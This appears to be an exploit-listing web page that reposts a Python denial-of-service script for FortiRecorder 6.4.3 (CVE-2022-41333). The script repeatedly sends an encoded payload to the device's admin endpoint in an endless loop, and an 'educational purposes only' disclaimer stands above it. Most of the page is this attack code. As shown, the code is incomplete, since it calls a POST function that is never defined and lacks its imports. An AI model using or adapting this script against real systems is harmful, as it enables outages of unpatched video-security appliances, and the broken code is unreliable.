Fortirecorder 6.4.3 denial of service Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-04-08 |
Type : dos |
Platform : hardware
This exploit / vulnerability Fortirecorder 6.4.3 denial of service is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: FortiRecorder 6.4.3 - Denial of Service
# Google Dork: N/A
# Date: 13/03/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder
# Version: 6.4.3 and below && 6.0.11 to 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-41333
# Security Advisory: https://www.fortiguard.com/psirt/FG-IR-22-388
# Technical Analysis: https://medium.com/@0xpolar/cve-2022-41333-71eb289d60b5
def GET(target, req_type, payload):
print("[+] Target : "+target)
print("[+] Request Type: GET")
print("[+] Payload : " +payload)
while True:
url = target+"/module/admin.fe?fewReq="+payload
headers = {"User-Agent": "CVE-2022-41333", "Connection": "close"}
r = requests.get(url, headers=headers, verify=False)
if "Failed: Access denied" in r.text:
print("[+] Payload Sent.")
else:
print("[!] Something went wrong!")
print(r.text)
print("[+] Starting ..")
target = str((sys.argv[1])) # https://fortirecorder.fortidemo.com
req_type = str((sys.argv[2])) # POST or GET
payload = str((sys.argv[3])) # :B:JSsrJW16blB9dXp8ayJMZmxcfnJee3J2cTltem5efGt2cHEiLio5amx6bXF+cnoi
if "post" in req_type.lower():
if "https" in target.lower() or "http" in target.lower():
POST(target, req_type, payload)
else:
print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
elif "get" in req_type.lower():
if "https" in target.lower() or "http" in target.lower():
GET(target, req_type, payload)
else:
print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
else:
print("[!] Invalid Request Type.")